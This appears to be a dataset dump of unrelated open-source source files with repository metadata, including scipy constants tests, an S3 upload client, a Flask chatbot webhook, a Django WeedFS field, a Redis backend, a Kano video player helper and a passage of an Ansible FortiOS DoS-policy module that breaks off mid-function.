apbard/scipy | scipy/constants/tests/test_constants.py | 2 | 3115 | from __future__ import division, print_function, absolute_import
from numpy.testing import assert_equal, assert_allclose
from scipy._lib._numpy_compat import suppress_warnings
import scipy.constants as sc
def test_convert_temperature():
assert_equal(sc.convert_temperature(32, 'f', 'Celsius'), 0)
assert_equal(sc.convert_temperature([0, 0], 'celsius', 'Kelvin'),
[273.15, 273.15])
assert_equal(sc.convert_temperature([0, 0], 'kelvin', 'c'),
[-273.15, -273.15])
assert_equal(sc.convert_temperature([32, 32], 'f', 'k'), [273.15, 273.15])
assert_equal(sc.convert_temperature([273.15, 273.15], 'kelvin', 'F'),
[32, 32])
assert_equal(sc.convert_temperature([0, 0], 'C', 'fahrenheit'), [32, 32])
assert_allclose(sc.convert_temperature([0, 0], 'c', 'r'), [491.67, 491.67],
rtol=0., atol=1e-13)
assert_allclose(sc.convert_temperature([491.67, 491.67], 'Rankine', 'C'),
[0., 0.], rtol=0., atol=1e-13)
assert_allclose(sc.convert_temperature([491.67, 491.67], 'r', 'F'),
[32., 32.], rtol=0., atol=1e-13)
assert_allclose(sc.convert_temperature([32, 32], 'fahrenheit', 'R'),
[491.67, 491.67], rtol=0., atol=1e-13)
assert_allclose(sc.convert_temperature([273.15, 273.15], 'K', 'R'),
[491.67, 491.67], rtol=0., atol=1e-13)
assert_allclose(sc.convert_temperature([491.67, 0.], 'rankine', 'kelvin'),
[273.15, 0.], rtol=0., atol=1e-13)
def test_fahrenheit_to_celsius():
with suppress_warnings() as sup:
sup.filter(DeprecationWarning, "`F2C` is deprecated!")
assert_equal(sc.F2C(32), 0)
assert_equal(sc.F2C([32, 32]), [0, 0])
def test_celsius_to_kelvin():
with suppress_warnings() as sup:
sup.filter(DeprecationWarning, "`C2K` is deprecated!")
assert_equal(sc.C2K([0, 0]), [273.15, 273.15])
def test_kelvin_to_celsius():
with suppress_warnings() as sup:
sup.filter(DeprecationWarning, "`K2C` is deprecated!")
assert_equal(sc.K2C([0, 0]), [-273.15, -273.15])
def test_fahrenheit_to_kelvin():
with suppress_warnings() as sup:
sup.filter(DeprecationWarning, "`F2K` is deprecated!")
sup.filter(DeprecationWarning, "`F2C` is deprecated!")
sup.filter(DeprecationWarning, "`C2K` is deprecated!")
assert_equal(sc.F2K([32, 32]), [273.15, 273.15])
def test_kelvin_to_fahrenheit():
with suppress_warnings() as sup:
sup.filter(DeprecationWarning, "`K2F` is deprecated!")
sup.filter(DeprecationWarning, "`K2C` is deprecated!")
sup.filter(DeprecationWarning, "`C2F` is deprecated!")
assert_equal(sc.K2F([273.15, 273.15]), [32, 32])
def test_celsius_to_fahrenheit():
with suppress_warnings() as sup:
sup.filter(DeprecationWarning, "`C2F` is deprecated!")
assert_equal(sc.C2F([0, 0]), [32, 32])
def test_lambda_to_nu():
assert_equal(sc.lambda2nu(sc.speed_of_light), 1)
def test_nu_to_lambda():
assert_equal(sc.nu2lambda(1), sc.speed_of_light)
| bsd-3-clause | 973,531,989,903,674,900 | 38.43038 | 79 | 0.608026 | false |
longaccess/longaccess-client | lacli/upload.py | 1 | 8840 | from lacli.exceptions import PauseEvent
from lacli.pool import MPUpload
from lacli.source.chunked import ChunkedFile
from lacore.storage.s3 import MPConnection
from lacore.api import UploadState as BaseUploadState
from contextlib import contextmanager
from lacli.log import getLogger
from lacli.progress import queueHandler
from lacli.control import ControlHandler
from lacli.worker import WorkerPool
from lacore.async import block
from twisted.internet import defer, threads
from itertools import count
from multiprocessing import TimeoutError
from multiprocessing import get_logger as mp_logging_init
import errno
import signal
class LogHandler(queueHandler):
def __init__(self, logger='lacli'):
self.logger = getLogger(logger)
def handle(self, msg):
self.logger.handle(msg)
class UploadState(BaseUploadState):
states = None
@classmethod
def has_state(cls, fname):
if cls.states is None:
cls.setup()
if fname in cls.states:
return True
return False
@classmethod
def init(cls, cache):
cls.cache = cache
@classmethod
def setup(cls):
uploads = cls.cache._get_uploads()
a = cls.cache._for_adf('archives')
sz = lambda f: a[f]['archive'].meta.size
cls.states = {k: cls(k, sz(k), **v)
for k, v in uploads.iteritems()
if k in a}
@classmethod
def get(cls, fname, size=None, capsule=None, sandbox=False):
if cls.states is None:
cls.setup()
if fname in cls.states:
state = cls.states[fname]
msg = "Can't change {} for upload"
if size is not None:
assert state.size == size, msg.format('size')
cls.states[fname].size = size
if capsule is not None:
# might be helpful if you want to change the capsule
if state.capsule is None:
state.capsule = capsule
cid = state.capsule.get('id', None)
assert cid == capsule['id'], msg.format('capsule')
cls.states[fname].capsule = capsule
if sandbox is True:
assert state.sandbox == sandbox, msg.format('sandbox status')
cls.states[fname].sandbox = True
return cls.states[fname]
cls.states[fname] = UploadState(fname, size, capsule=capsule,
sandbox=sandbox)
return cls.states[fname]
@classmethod
def reset(cls, fname):
if cls.states is None:
cls.setup()
if fname not in cls.states:
raise ValueError("Upload doesn't exist!")
cls.cache._del_upload(fname)
return cls.states.pop(fname)
    def __init__(self, archive, size, keys=None,
                 exc=None, paused=True, **kwargs):
super(UploadState, self).__init__(archive, size, **kwargs)
self.cache = type(self).cache
self.logfile = self.control = None
        self.keys = keys if keys is not None else []
self.progress = reduce(lambda x, y: x + y['size'], self.keys, 0)
self.pausing = False
self._paused = paused
self.exc = exc
self.deferred_upload = None
def __enter__(self):
try:
self.exc = None
self.control = ControlHandler()
self.logfile = self.cache._upload_open(self.archive, mode='r+')
getLogger().debug("Found state file for %s", self.archive)
except IOError as e:
if e.errno == errno.ENOENT:
getLogger().debug("Creating state file for %s", self.archive)
self.logfile = self.cache._upload_open(self.archive, mode='w+')
else:
raise e
# update keys from file
upload = self.cache._validate_upload(self.logfile)
self.uri = upload.get('uri', self.uri)
self.keys = upload.get('keys', self.keys)
if self._paused is True:
self._paused = False
self.cache._write_upload(
self.uri, self.capsule, self.logfile,
self.exc, self._paused)
return self
@block
@defer.inlineCallbacks
def wait_for_upload(self):
try:
result = yield self.deferred_upload
defer.returnValue(result)
except PauseEvent:
pass
if self.pausing is True:
self.paused()
def __exit__(self, type, value, traceback):
if type is not None:
if type == PauseEvent:
getLogger().debug("upload paused.")
self.paused()
else:
getLogger().debug("error in upload", exc_info=True)
self.error(value)
if self.logfile is not None:
self.logfile.close()
self.logfile = self.control = None
return type is None
def keydone(self, key, size):
assert self.logfile is not None, "Log not open"
self.keys.append(
self.cache._checkpoint_upload(key, size, self.logfile))
def update(self, progress):
self.progress = progress
@property
def seq(self):
return len(self.keys)
def pause(self):
if not self.pausing and self.control is not None:
self.control.pause()
self.pausing = True
def paused(self):
getLogger().debug("upload state paused")
if self.exc is not None:
getLogger().debug("can't pause a failed upload")
return
self._paused = True
if self.pausing is True:
self.pausing = False
self.cache._write_upload(
self.uri, self.capsule, self.logfile,
self.exc, self._paused)
def active(self):
return self._paused is False and self.exc is None
def signal(self, sig, frame):
getLogger().debug("Got interrupt")
if sig == signal.SIGINT:
getLogger().debug("Pausing")
if self.pausing is True:
raise SystemExit("Interrupted")
self.pausing = True
self.control.pause()
def save_op(self, op):
assert self.uri is None, "Can't change URI for upload state"
if op.uri is None:
return
self.cache._write_upload(op.uri, self.capsule, self.logfile,
self.exc, self._paused)
self.uri = op.uri
def error(self, exc):
if self.exc is None:
self.cache._write_upload(self.uri, self.capsule,
self.logfile, str(exc), self._paused)
self.exc = exc
class Upload(object):
def __init__(self, session, nprocs, debug, state):
self.prefs = {
'nprocs': nprocs,
'debugworker': debug > 2
}
self.log = LogHandler()
self.state = state
@contextmanager
def _workers(self, progq):
with self.log as logq:
with self.state.control as ctrlq:
mp_logging_init()
pool = WorkerPool(
self.prefs, logq, progq, ctrlq)
try:
yield pool
finally:
getLogger().debug("terminating pool")
pool.terminate()
pool.join()
def upload_temp(self, token, source, etags, pool, seq):
key = "temp-archive-{seq}".format(seq=seq)
connection = MPConnection(**token)
with MPUpload(connection, source, key) as uploader:
etags[key], source = uploader.get_result(
uploader.submit_job(pool))
return source
@defer.inlineCallbacks
def upload(self, fname, upload, progq):
with self._workers(progq) as pool:
etags = {}
source = ChunkedFile(fname, self.state.progress)
token = yield upload.status
for seq in count(start=self.state.seq):
try:
source = yield threads.deferToThread(
self.upload_temp, token, source, etags, pool, seq)
except PauseEvent:
getLogger().debug(
"paused after uploading %d temporary keys", seq)
raise
except TimeoutError:
getLogger().debug(
"timeout after uploading %d temporary keys", seq)
token = yield upload.status
if source is None:
getLogger().debug("uploaded entire archive")
break
getLogger().debug("uploaded %d temp keys", len(etags))
for key, tag in etags.iteritems():
getLogger().debug("key: %s (etag: %s)", key, tag)
# vim: et:sw=4:ts=4
| apache-2.0 | 7,196,664,246,178,638,000 | 33.131274 | 79 | 0.552262 | false |
MukunthanAlagarsamy/UCC_attempt1 | app.py | 1 | 1772 | #!/usr/bin/env python
import urllib
import json
import os
from flask import Flask
from flask import request
from flask import make_response
# Flask app should start in global layout
app = Flask(__name__)
@app.route('/webhook', methods=['POST'])
def webhook():
req = request.get_json(silent=True, force=True)
print("Request:")
print(json.dumps(req, indent=4))
res = makeWebhookResult(req)
res = json.dumps(res, indent=4)
print(res)
r = make_response(res)
r.headers['Content-Type'] = 'application/json'
return r
def makeWebhookResult(req):
if req.get("result").get("action") != "shipping.cost":
return {}
if req.get("result").get("action") == "shipping.cost":
result = req.get("result")
parameters = result.get("parameters")
zone = parameters.get("shipping-zone")
cost = {'Europe':100, 'North America':200, 'South America':300, 'Asia':400, 'Africa':500}
speech = "The cost of shipping to " + zone + " is " + str(cost[zone]) + " euros."
if req.get("result").get("action") == "product.identification":
# result = req.get("result")
# parameters = result.get("parameters")
# zone = parameters.get("producttype")
# cost = {'TV':100, 'Mobile':"Whats the problem with your Mobile", 'Bank':'Whats the problem with your Bank'}
speech = "Thank u"
print("Response:")
print(speech)
return {
"speech": speech,
"displayText": speech,
#"data": {},
# "contextOut": [],
"source": "apiai-onlinestore-shipping"
}
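# Illustrative request/response pair for the handler above (field names taken
# from the code; the exact JSON an API.AI agent sends may differ):
#
#   request body:   {"result": {"action": "shipping.cost",
#                               "parameters": {"shipping-zone": "Europe"}}}
#   webhook reply:  {"speech": "The cost of shipping to Europe is 100 euros.",
#                    "displayText": "...", "source": "apiai-onlinestore-shipping"}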
if __name__ == '__main__':
port = int(os.getenv('PORT', 5000))
print "Starting app on port %d" % port
app.run(debug=True, port=port, host='0.0.0.0')
| apache-2.0 | 590,739,204,705,281,700 | 25.447761 | 116 | 0.597065 | false |
ProstoKSI/django-weed | djweed/db_fields.py | 1 | 2767 | from django.contrib.contenttypes.models import ContentType
try:
from django.core.urlresolvers import reverse
except ImportError: # Django 2.0
from django.urls import reverse
from django.db.models.fields.files import FieldFile, FileField
from django.utils import six
from .storage import WeedFSStorage
class WeedFSFieldFile(FieldFile):
def _split_name(self):
splitted_name = self.name.split(':', 1)
if len(splitted_name) == 2:
return splitted_name
return splitted_name[0], ''
def _get_storage_fid(self):
return self._split_name()[0]
storage_fid = property(_get_storage_fid)
def _get_verbose_name(self):
return self._split_name()[1]
verbose_name = property(_get_verbose_name)
def _get_content(self):
self._require_file()
return self.storage.content(self.storage_fid)
content = property(_get_content)
def _get_url(self):
self._require_file()
content_type = ContentType.objects.get_for_model(self.instance._meta.model)
return reverse('weedfs_get_file', kwargs={
'content_type_id': content_type.id,
'object_id': self.instance.id,
'field_name': self.field.name,
'file_name': self.verbose_name,
})
url = property(_get_url)
def _get_storage_url(self):
self._require_file()
return self.storage.url(self.storage_fid)
storage_url = property(_get_storage_url)
class WeedFSFileField(FileField):
# The class to wrap instance attributes in. Accessing the file object off
# the instance will always return an instance of attr_class.
attr_class = WeedFSFieldFile
def __init__(self, verbose_name=None, name=None, storage=None, **kwargs):
kwargs.pop('upload_to', None)
storage = kwargs.pop('storage', None)
if storage is None:
storage = WeedFSStorage()
super(WeedFSFileField, self).__init__(verbose_name, name,
storage=storage, **kwargs)
def get_prep_value(self, value):
"Returns field's value prepared for saving into a database."
# Need to convert File objects provided via a form to unicode for database insertion
if value is None:
return None
if isinstance(value, six.string_types):
return six.text_type(value)
if value.name == '':
return ''
if isinstance(value, WeedFSFieldFile):
return value.name
return self.storage.save(None, value)
def south_field_triple(self):
from south.modelsinspector import introspector
field_class = "django.db.models.fields.CharField"
args, kwargs = introspector(self)
return (field_class, args, kwargs)
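# Hypothetical usage sketch (model and field names are made up): the field is
# declared like any Django FileField, stores data through WeedFSStorage, and
# keeps names of the form "<fid>:<original file name>".
#
#     class Document(models.Model):
#         attachment = WeedFSFileField()
#
#     doc.attachment.storage_fid    # weed-fs fid part of the stored name
#     doc.attachment.verbose_name   # original file name part
#     doc.attachment.url            # routed through the weedfs_get_file view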
| mit | 4,202,618,077,747,209,000 | 32.743902 | 92 | 0.641128 | false |
COCS4950G7/COSC4950 | Resources/Tkinter Examples/Tkinter_example.py | 1 | 1256 |
#import Tkinter
#l = Tkinter.Label(text = "***************************See me?*************************")
#l.pack()
#l.mainloop()
#print("Howdy")
#omfg
#print("dostuff")
# http://www.ferg.org/thinking_in_tkinter/all_programs.html
from Tkinter import *
class MyApp:
def __init__(self, parent):
self.myParent = parent ### (7) remember my parent, the root
self.myContainer1 = Frame(parent)
self.myContainer1.pack()
self.button1 = Button(self.myContainer1)
self.button1.configure(text="OK", background= "green")
self.button1.pack(side=LEFT)
self.button1.bind("<Button-1>", self.button1Click) ### (1)
self.button2 = Button(self.myContainer1)
self.button2.configure(text="Cancel", background="red")
self.button2.pack(side=RIGHT)
self.button2.bind("<Button-1>", self.button2Click) ### (2)
def button1Click(self, event): ### (3)
if self.button1["background"] == "green": ### (4)
self.button1["background"] = "yellow"
else:
self.button1["background"] = "green"
def button2Click(self, event): ### (5)
self.myParent.destroy() ### (6)
root = Tk()
myapp = MyApp(root)
root.mainloop() | gpl-3.0 | 5,148,761,549,873,680,000 | 19.95 | 88 | 0.57086 | false |
barthoekstra/Orographic-Landscape-Navigator | gisactions.py | 1 | 1466 | #!/usr/bin/python
# This code is simply a wrapper for running gdal commands, without MATLAB
# causing issues with dependencies, etc.
import sys
import os
print(sys.argv[0])
action = sys.argv[1]
targetfile = sys.argv[2]
if action == "merge":
print('Mergeing...')
# gdalbuildvrt merged.vrt r14bn2.wgs84.tif r14en1.wgs84.tif r14ez1.wgs84.tif r14bz2.wgs84.tif r14bz1.wgs84.tif r14bn1.wgs84.tif r09dz1.wgs84.tif r09dz2.wgs84.tif r09gz1.wgs84.tif
# gdalbuildvrt output.vrt files-to-be-merged.tif separated-by-spaces.tif
# python gisactions.py merge data/dem/output.vrt data/dem/r14bn2.wgs84.tif data/dem/r14bn1.wgs84.tif
# First create a virtual mosaic
# Cmd format: gdalbuildvrt output.vrt file1.tif file2.tif file3.tif
print('Creating mosaic...')
targetvrt = targetfile.replace(".tif", ".vrt")
cmd_mosaic = "gdalbuildvrt %s %s" % (targetvrt, ' '.join(sys.argv[3:]))
os.system(cmd_mosaic)
# Now translate the mosaic to an actual GeoTiff
# Cmd format: gdal_translate -of GTiff mosaic.vrt output.tif
mergedfile = sys.argv[2].replace(".wgs84.tif", ".merged.wgs84.vrt")
cmd_merge = "gdal_translate -a_srs \"+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs\" -of GTiff %s %s" % (targetvrt, targetfile)
os.system(cmd_merge)
# Now remove the .vrt
os.remove(targetvrt)
print('Merge finished...')
elif action == "reproject":
print('Reprojecting...')
else:
print('No valid action provided.')
| gpl-3.0 | -5,237,369,659,882,149,000 | 35.65 | 182 | 0.697817 | false |
MaxTyutyunnikov/lino | obsolete/src/lino/apps/pizzeria/services.py | 1 | 2711 | ## Copyright 2003-2007 Luc Saffre
## This file is part of the Lino project.
## Lino is free software; you can redistribute it and/or modify it
## under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
## Lino is distributed in the hope that it will be useful, but WITHOUT
## ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
## or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
## License for more details.
## You should have received a copy of the GNU General Public License
## along with Lino; if not, write to the Free Software Foundation,
## Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
from lino.adamo.ddl import *
from lino.adamo.datatypes import itod
from lino.apps.pizzeria import pizzeria
#from lino.apps.pizzeria.pizzeria import Orders, Products, OrderLines, Customers
class Service(pizzeria.Product):
tableName="Services"
def initTable(self,table):
pizzeria.Product.initTable(self,table)
table.addField('responsible',STRING)
class ServicesReport(DataReport):
leadTable=Service
class MyPizzeriaSchema(pizzeria.PizzeriaSchema):
tableClasses = (pizzeria.Product,
Service,
pizzeria.Customer,
pizzeria.Order, pizzeria.OrderLine)
class MyPizzeriaMain(pizzeria.PizzeriaMain):
schemaClass=MyPizzeriaSchema
"""
Welcome to MyPizzeria, a customization of the most simple Lino demo
application. Note that this application is for demonstration purposes
only.
"""
def setupMenu(self):
m = self.addMenu("my","&My Pizzeria")
self.addReportItem(
m,"services",ServicesReport,label="&Services")
pizzeria.PizzeriaMain.setupMenu(self)
class MyPizzeria(pizzeria.Pizzeria):
name="My Pizzeria"
mainFormClass=MyPizzeriaMain
def populate(dbc):
pizzeria.populate(dbc)
SERV = dbc.query(Service)
CUST = dbc.query(pizzeria.Customer)
ORDERS = dbc.query(pizzeria.Order)
PROD = dbc.query(pizzeria.Product)
s1 = SERV.appendRow(name="bring home",price=1)
s2 = SERV.appendRow(name="organize party",price=100)
c3 = CUST.appendRow(name="Bernard")
o1 = ORDERS.appendRow(customer=c3,date=itod(20040318))
q = o1.lines()
q.appendRow(product=PROD.peek(1),qty=1)
q.appendRow(product=s1,qty=1)
o2 = ORDERS.appendRow(customer=CUST.peek(1),date=itod(20040319))
q = o2.lines()
q.appendRow(product=PROD.peek(1),qty=2)
q.appendRow(product=PROD.peek(2),qty=3)
o1.register()
o2.register()
| gpl-3.0 | 4,601,415,181,698,994,000 | 27.536842 | 80 | 0.694947 | false |
cwoebker/relo | relo/core/backend/redisdb.py | 1 | 1633 | #!/usr/bin/env python
# encoding: utf-8
import sys
import os
import redis
from relo.core.log import logger
dirname = os.path.dirname(os.path.abspath(__file__))
up_dir = os.path.dirname(dirname)
sys.path.append(up_dir)
from relo.core.interfaces import Backend
class REDISDB(Backend):
name = "redis"
expiretime = 60*60*24*7 # for a week
def init(self):
logger.debug("Connecting to Redis")
self.connection = redis.StrictRedis(host='localhost', port=6379, db=12)
def check(self):
logger.debug("check not needed with redis")
def load(self):
logger.debug("Redis auto loads")
def save(self):
self.connection.save()
def addProject(self, key, project, type):
project_string = project + ":::" + type
self.connection.sadd(key, project_string)
def listProjects(self, key):
members = self.connection.smembers(key)
returnList = []
for member in members:
returnList.append(member.split(":::"))
return returnList
def addMeta(self, path, modified, hash, size, type):
pipe = self.connection.pipeline()
pipe.hmset(path, dict(modified=modified, hash=hash, size=size, type=type)).expire(path, self.expiretime).execute()
del pipe
def addSet(self, key, value):
self.connection.sadd(key, value)
def getSet(self, key):
return self.connection.smembers(key)
def get(self, key, field):
return self.connection.hget(key, field)
def find(self, key):
return self.connection.keys(pattern='*'+key+'*')
def end(self):
self.connection.shutdown() | bsd-3-clause | -2,834,990,471,099,505,700 | 32.346939 | 122 | 0.644213 | false |
KanoComputing/kano-video | kano_video/logic/player.py | 1 | 4469 | # player.py
#
# Copyright (C) 2014-2016 Kano Computing Ltd.
# License: http://www.gnu.org/licenses/gpl-2.0.txt GNU GPL v2
#
# Manages playing of videos
import sys
import os
from kano.utils import is_installed, run_bg, get_volume, percent_to_millibel
from kano.logging import logger
from .youtube import get_video_file_url
# Support for Gtk versions 3 and 2
try:
from gi.repository import GObject
except ImportError:
import gobject as GObject
import playudev
subtitles_dir = '/usr/share/kano-media/videos/subtitles'
omxplayer_present = is_installed('omxplayer')
vlc_present = is_installed('vlc')
if not omxplayer_present and not vlc_present:
sys.exit('Neither vlc nor omxplayer is installed!')
def play_video(_button=None, video_url=None, localfile=None, subtitles=None,
init_threads=True, keyboard_engulfer=True):
"""
Plays a local or remote video using the optimal video player found.
Handles sound settings and subtitles.
"""
if video_url:
logger.info('Getting video url: {}'.format(video_url))
success, data = get_video_file_url(video_url)
if not success:
logger.error('Error with getting YouTube url: {}'.format(data))
if _button:
_button.set_sensitive(True)
return
link = data
elif localfile:
link = localfile
else:
if _button:
_button.set_sensitive(True)
return
logger.info('Launching player...')
if omxplayer_present:
volume_percent = get_volume()
volume_str = '--vol {}'.format(
percent_to_millibel(volume_percent, raspberry_mod=True))
if not subtitles or not os.path.isfile(subtitles):
subtitles = None
if localfile:
filename = os.path.basename(localfile)
filename = os.path.splitext(filename)[0]
fullpath = os.path.join(subtitles_dir, filename + '.srt')
if os.path.exists(fullpath):
subtitles = fullpath
if not subtitles:
subtitles = os.path.join(subtitles_dir, 'controls.srt')
subtitles_str = ''
try:
from kano_settings.system.display import is_overscan
if not is_overscan():
subtitles_str = '--subtitle "{subtitles}" ' \
'--font "/usr/share/fonts/kano/bariol/Bariol_Regular.otf" --font-size 35 ' \
'--align center'.format(subtitles=subtitles)
except Exception:
pass
# Set the audio output between HDMI or Jack. Default is HDMI since it's the
# safest route given the PiHat lib getting destabilised if Jack is used.
audio_out = 'hdmi'
try:
from kano_settings.system.audio import is_HDMI
if not is_HDMI():
audio_out = 'local'
except Exception:
pass
player_cmd = 'omxplayer -o {audio_out} {volume_str} {subtitles} -b "{link}"' \
''.format(
audio_out=audio_out,
link=link,
volume_str=volume_str,
subtitles=subtitles_str
)
else:
player_cmd = 'vlc -f --no-video-title-show ' \
'"{link}"'.format(link=link)
# Play with keyboard interaction coming from udev directly
# so that we do not lose focus and capture all key presses
playudev.run_player(player_cmd, init_threads=init_threads,
keyboard_engulfer=keyboard_engulfer)
# finally, enable the button back again
if _button:
_button.set_sensitive(True)
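# Hedged usage sketch (URL and path below are placeholders), showing the two
# typical ways the helper above can be invoked:
#
#     play_video(video_url='http://www.youtube.com/watch?v=XXXXXXXXXXX')
#     play_video(localfile='/path/to/some/video.mp4', subtitles=None)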
def get_centred_coords(width, height):
"""
Calculates the top-left and bottom-right coordinates for a given window
size to be centred
"""
from gi.repository import Gdk
taskbar_height = 44
monitor = {
'width': Gdk.Screen.width(),
'height': Gdk.Screen.height(),
}
x1 = (monitor['width'] - width) / 2
x2 = x1 + width
y1 = ((monitor['height'] - taskbar_height) - height) / 2
y2 = y1 + height
return x1, y1, x2, y2
def stop_videos(_button=None):
"""
Kills all videos that are currently playing
# TODO: Stop only videos which are managed by this module
"""
if omxplayer_present:
run_bg('killall omxplayer.bin')
else:
run_bg('killall vlc')
| gpl-2.0 | 4,278,216,597,469,036,500 | 28.596026 | 96 | 0.590065 | false |
amenonsen/ansible | lib/ansible/modules/network/fortios/fortios_firewall_DoS_policy6.py | 1 | 16272 | #!/usr/bin/python
from __future__ import (absolute_import, division, print_function)
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: fortios_firewall_DoS_policy6
short_description: Configure IPv6 DoS policies in Fortinet's FortiOS and FortiGate.
description:
- This module is able to configure a FortiGate or FortiOS device by allowing the
user to set and modify firewall feature and DoS_policy6 category.
      Examples include all parameters and values which need to be adjusted to datasources before usage.
Tested with FOS v6.0.5
version_added: "2.8"
author:
- Miguel Angel Munoz (@mamunozgonzalez)
- Nicolas Thomas (@thomnico)
notes:
- Requires fortiosapi library developed by Fortinet
- Run as a local_action in your playbook
requirements:
- fortiosapi>=0.9.8
options:
host:
description:
- FortiOS or FortiGate IP address.
type: str
required: false
username:
description:
- FortiOS or FortiGate username.
type: str
required: false
password:
description:
- FortiOS or FortiGate password.
type: str
default: ""
vdom:
description:
- Virtual domain, among those defined previously. A vdom is a
virtual instance of the FortiGate that can be configured and
used as a different unit.
type: str
default: root
https:
description:
- Indicates if the requests towards FortiGate must use HTTPS protocol.
type: bool
default: true
ssl_verify:
description:
- Ensures FortiGate certificate must be verified by a proper CA.
type: bool
default: true
version_added: 2.9
state:
description:
- Indicates whether to create or remove the object.
type: str
choices:
- present
- absent
version_added: 2.9
firewall_DoS_policy6:
description:
- Configure IPv6 DoS policies.
default: null
type: dict
suboptions:
anomaly:
description:
- Anomaly name.
type: list
suboptions:
action:
description:
- Action taken when the threshold is reached.
type: str
choices:
- pass
- block
log:
description:
- Enable/disable anomaly logging.
type: str
choices:
- enable
- disable
name:
description:
- Anomaly name.
required: true
type: str
quarantine:
description:
- Quarantine method.
type: str
choices:
- none
- attacker
quarantine_expiry:
description:
- Duration of quarantine. (Format ###d##h##m, minimum 1m, maximum 364d23h59m, default = 5m). Requires quarantine set to attacker.
type: str
quarantine_log:
description:
- Enable/disable quarantine logging.
type: str
choices:
- disable
- enable
status:
description:
- Enable/disable this anomaly.
type: str
choices:
- disable
- enable
threshold:
description:
- Anomaly threshold. Number of detected instances per minute that triggers the anomaly action.
type: int
threshold(default):
description:
- Number of detected instances per minute which triggers action (1 - 2147483647, default = 1000). Note that each anomaly has a
different threshold value assigned to it.
type: int
comments:
description:
- Comment.
type: str
dstaddr:
description:
- Destination address name from available addresses.
type: list
suboptions:
name:
description:
- Address name. Source firewall.address6.name firewall.addrgrp6.name.
required: true
type: str
interface:
description:
- Incoming interface name from available interfaces. Source system.zone.name system.interface.name.
type: str
policyid:
description:
- Policy ID.
required: true
type: int
service:
description:
- Service object from available options.
type: list
suboptions:
name:
description:
- Service name. Source firewall.service.custom.name firewall.service.group.name.
required: true
type: str
srcaddr:
description:
- Source address name from available addresses.
type: list
suboptions:
name:
description:
- Service name. Source firewall.address6.name firewall.addrgrp6.name.
required: true
type: str
status:
description:
- Enable/disable this policy.
type: str
choices:
- enable
- disable
'''
EXAMPLES = '''
- hosts: localhost
vars:
host: "192.168.122.40"
username: "admin"
password: ""
vdom: "root"
ssl_verify: "False"
tasks:
- name: Configure IPv6 DoS policies.
fortios_firewall_DoS_policy6:
host: "{{ host }}"
username: "{{ username }}"
password: "{{ password }}"
vdom: "{{ vdom }}"
https: "False"
state: "present"
firewall_DoS_policy6:
anomaly:
-
action: "pass"
log: "enable"
name: "default_name_6"
quarantine: "none"
quarantine_expiry: "<your_own_value>"
quarantine_log: "disable"
status: "disable"
threshold: "11"
threshold(default): "12"
comments: "<your_own_value>"
dstaddr:
-
name: "default_name_15 (source firewall.address6.name firewall.addrgrp6.name)"
interface: "<your_own_value> (source system.zone.name system.interface.name)"
policyid: "17"
service:
-
name: "default_name_19 (source firewall.service.custom.name firewall.service.group.name)"
srcaddr:
-
name: "default_name_21 (source firewall.address6.name firewall.addrgrp6.name)"
status: "enable"
'''
RETURN = '''
build:
description: Build number of the fortigate image
returned: always
type: str
sample: '1547'
http_method:
description: Last method used to provision the content into FortiGate
returned: always
type: str
sample: 'PUT'
http_status:
description: Last result given by FortiGate on last operation applied
returned: always
type: str
sample: "200"
mkey:
description: Master key (id) used in the last call to FortiGate
returned: success
type: str
sample: "id"
name:
description: Name of the table used to fulfill the request
returned: always
type: str
sample: "urlfilter"
path:
description: Path of the table used to fulfill the request
returned: always
type: str
sample: "webfilter"
revision:
description: Internal revision number
returned: always
type: str
sample: "17.0.2.10658"
serial:
description: Serial number of the unit
returned: always
type: str
sample: "FGVMEVYYQT3AB5352"
status:
description: Indication of the operation's result
returned: always
type: str
sample: "success"
vdom:
description: Virtual domain used
returned: always
type: str
sample: "root"
version:
description: Version of the FortiGate
returned: always
type: str
sample: "v5.6.3"
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.connection import Connection
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
from ansible.module_utils.network.fortimanager.common import FAIL_SOCKET_MSG
def login(data, fos):
host = data['host']
username = data['username']
password = data['password']
ssl_verify = data['ssl_verify']
fos.debug('on')
if 'https' in data and not data['https']:
fos.https('off')
else:
fos.https('on')
fos.login(host, username, password, verify=ssl_verify)
def filter_firewall_DoS_policy6_data(json):
option_list = ['anomaly', 'comments', 'dstaddr',
'interface', 'policyid', 'service',
'srcaddr', 'status']
dictionary = {}
for attribute in option_list:
if attribute in json and json[attribute] is not None:
dictionary[attribute] = json[attribute]
return dictionary
def underscore_to_hyphen(data):
if isinstance(data, list):
for elem in data:
elem = underscore_to_hyphen(elem)
elif isinstance(data, dict):
new_data = {}
for k, v in data.items():
new_data[k.replace('_', '-')] = underscore_to_hyphen(v)
data = new_data
return data
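# Illustrative example (not part of the module): underscore_to_hyphen(
# {'quarantine_expiry': '5m'}) returns {'quarantine-expiry': '5m'}, the
# hyphenated key style expected by the FortiOS API.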
def firewall_DoS_policy6(data, fos):
vdom = data['vdom']
state = data['state']
firewall_DoS_policy6_data = data['firewall_DoS_policy6']
filtered_data = underscore_to_hyphen(filter_firewall_DoS_policy6_data(firewall_DoS_policy6_data))
if state == "present":
return fos.set('firewall',
'DoS-policy6',
data=filtered_data,
vdom=vdom)
elif state == "absent":
return fos.delete('firewall',
'DoS-policy6',
mkey=filtered_data['policyid'],
vdom=vdom)
def is_successful_status(status):
return status['status'] == "success" or \
status['http_method'] == "DELETE" and status['http_status'] == 404
def fortios_firewall(data, fos):
if data['firewall_DoS_policy6']:
resp = firewall_DoS_policy6(data, fos)
return not is_successful_status(resp), \
resp['status'] == "success", \
resp
def main():
fields = {
"host": {"required": False, "type": "str"},
